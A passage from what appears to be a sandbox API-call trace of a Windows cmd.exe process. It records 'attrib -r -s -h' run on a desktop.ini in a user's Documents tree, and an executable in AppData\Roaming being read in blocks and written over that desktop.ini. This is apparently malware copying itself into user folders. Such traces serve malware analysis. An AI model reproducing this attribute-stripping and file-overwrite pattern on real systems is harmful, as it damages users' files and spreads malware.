fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ed90) returned 0xffffffff [0127.936] GetLastError () returned 0x2 [0127.936] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x24ed90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ed90) returned 0xffffffff [0127.936] GetLastError () returned 0x2 [0127.936] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x24ed90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ed90) returned 0x4426a0 [0127.936] FindClose (in: hFindFile=0x4426a0 | out: hFindFile=0x4426a0) returned 1 [0127.937] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x24ed90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ed90) returned 0xffffffff [0127.937] GetLastError () returned 0x2 [0127.937] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x24ed90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ed90) returned 0x4426a0 [0127.937] FindClose (in: hFindFile=0x4426a0 | out: hFindFile=0x4426a0) returned 1 [0127.937] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0127.937] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0127.937] GetConsoleTitleW (in: lpConsoleTitle=0x24f288, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.937] InitializeProcThreadAttributeList (in: lpAttributeList=0x24f110, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x24f1d8 | out: lpAttributeList=0x24f110, lpSize=0x24f1d8) returned 1 [0127.937] UpdateProcThreadAttribute (in: lpAttributeList=0x24f110, dwFlags=0x0, Attribute=0x60001, lpValue=0x24f1d0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x24f110, lpPreviousValue=0x0) returned 1 [0127.937] GetStartupInfoW (in: lpStartupInfo=0x24f0cc | out: lpStartupInfo=0x24f0cc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0127.937] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0127.938] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x24f16c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24f1b8 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" ", lpProcessInformation=0x24f1b8*(hProcess=0x50, hThread=0x4c, dwProcessId=0x92c, dwThreadId=0x7cc)) returned 1 [0127.980] CloseHandle (hObject=0x4c) returned 1 [0127.980] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0127.980] GetEnvironmentStringsW () returned 0x440d58* [0127.980] FreeEnvironmentStringsW (penv=0x440d58) returned 1 [0127.980] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0128.145] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x24f0ac | out: lpExitCode=0x24f0ac*=0x0) returned 1 [0128.145] CloseHandle (hObject=0x50) returned 1 [0128.146] _vsnwprintf (in: _Buffer=0x24f1f4, _BufferCount=0x13, _Format="%08X", _ArgList=0x24f0b8 | out: _Buffer="00000000") returned 8 [0128.146] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0128.146] GetEnvironmentStringsW () returned 0x4426f0* [0128.146] FreeEnvironmentStringsW (penv=0x4426f0) returned 1 [0128.146] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0128.146] GetEnvironmentStringsW () returned 0x4426f0* [0128.146] FreeEnvironmentStringsW (penv=0x4426f0) returned 1 [0128.146] DeleteProcThreadAttributeList (in: lpAttributeList=0x24f110 | out: lpAttributeList=0x24f110) [0128.146] GetConsoleTitleW (in: lpConsoleTitle=0x24f490, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.147] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x24e508, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x24e50c, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x24e508*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0128.147] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0128.147] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0128.147] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0128.147] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\desktop.ini")) returned 0xffffffff [0128.147] GetLastError () returned 0x2 [0128.147] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1")) returned 0x10 [0128.148] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0128.148] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0128.148] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\desktop.ini")) returned 0xffffffff [0128.148] GetLastError () returned 0x2 [0128.148] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x4439dc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4439dc) returned 0xffffffff [0128.148] GetLastError () returned 0x2 [0128.148] _get_osfhandle (_FileHandle=2) returned 0xb [0128.148] GetFileType (hFile=0xb) returned 0x2 [0128.148] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0128.148] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24ef08 | out: lpMode=0x24ef08) returned 1 [0128.148] _get_osfhandle (_FileHandle=2) returned 0xb [0128.149] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x24ef3c | out: lpConsoleScreenBufferInfo=0x24ef3c) returned 1 [0128.149] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0128.150] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.150] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.150] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.150] GetFileType (hFile=0x7) returned 0x2 [0128.150] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0128.150] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f62c | out: lpMode=0x24f62c) returned 1 [0128.150] _dup (_FileHandle=1) returned 3 [0128.150] _close (_FileHandle=1) returned 0 [0128.151] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini", _String2="con") returned -53 [0128.151] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x24f5fc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0128.151] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0128.151] GetConsoleTitleW (in: lpConsoleTitle=0x24f42c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.151] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x24ef90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ef90) returned 0x43e7e0 [0128.151] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0128.152] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0128.152] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0128.152] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x24de9c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0128.152] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0128.152] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.152] GetFileType (hFile=0x58) returned 0x1 [0128.152] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.152] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x24def4 | out: lpFileSizeHigh=0x24def4*=0x0) returned 0x7d600 [0128.152] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.152] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.152] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.152] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.153] GetFileType (hFile=0x50) returned 0x1 [0128.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.153] GetFileType (hFile=0x50) returned 0x1 [0128.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.154] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.155] GetFileType (hFile=0x50) returned 0x1 [0128.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.155] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.155] GetFileType (hFile=0x50) returned 0x1 [0128.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.155] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.155] GetFileType (hFile=0x50) returned 0x1 [0128.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.155] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.155] GetFileType (hFile=0x50) returned 0x1 [0128.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.155] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.156] GetFileType (hFile=0x50) returned 0x1 [0128.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.156] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.156] GetFileType (hFile=0x50) returned 0x1 [0128.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.156] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.156] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.156] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.156] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.156] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.156] GetFileType (hFile=0x50) returned 0x1 [0128.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.156] GetFileType (hFile=0x50) returned 0x1 [0128.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.156] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.156] GetFileType (hFile=0x50) returned 0x1 [0128.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.157] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.157] GetFileType (hFile=0x50) returned 0x1 [0128.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.157] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.157] GetFileType (hFile=0x50) returned 0x1 [0128.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.157] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.157] GetFileType (hFile=0x50) returned 0x1 [0128.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.157] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.157] GetFileType (hFile=0x50) returned 0x1 [0128.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.157] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.157] GetFileType (hFile=0x50) returned 0x1 [0128.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.158] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.158] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.158] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.158] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.158] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.158] GetFileType (hFile=0x50) returned 0x1 [0128.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.158] GetFileType (hFile=0x50) returned 0x1 [0128.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.158] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.158] GetFileType (hFile=0x50) returned 0x1 [0128.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.158] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.158] GetFileType (hFile=0x50) returned 0x1 [0128.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.158] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.158] GetFileType (hFile=0x50) returned 0x1 [0128.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.158] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.159] GetFileType (hFile=0x50) returned 0x1 [0128.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.159] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.159] GetFileType (hFile=0x50) returned 0x1 [0128.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.159] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.159] GetFileType (hFile=0x50) returned 0x1 [0128.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.159] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.159] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.159] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.159] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.159] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.159] GetFileType (hFile=0x50) returned 0x1 [0128.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.159] GetFileType (hFile=0x50) returned 0x1 [0128.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.159] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.160] GetFileType (hFile=0x50) returned 0x1 [0128.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.160] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.160] GetFileType (hFile=0x50) returned 0x1 [0128.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.160] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.160] GetFileType (hFile=0x50) returned 0x1 [0128.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.160] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.160] GetFileType (hFile=0x50) returned 0x1 [0128.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.160] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.160] GetFileType (hFile=0x50) returned 0x1 [0128.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.160] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.160] GetFileType (hFile=0x50) returned 0x1 [0128.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.160] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.160] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.160] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.160] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.160] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.160] GetFileType (hFile=0x50) returned 0x1 [0128.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.161] GetFileType (hFile=0x50) returned 0x1 [0128.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.161] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.161] GetFileType (hFile=0x50) returned 0x1 [0128.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.161] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.161] GetFileType (hFile=0x50) returned 0x1 [0128.161] 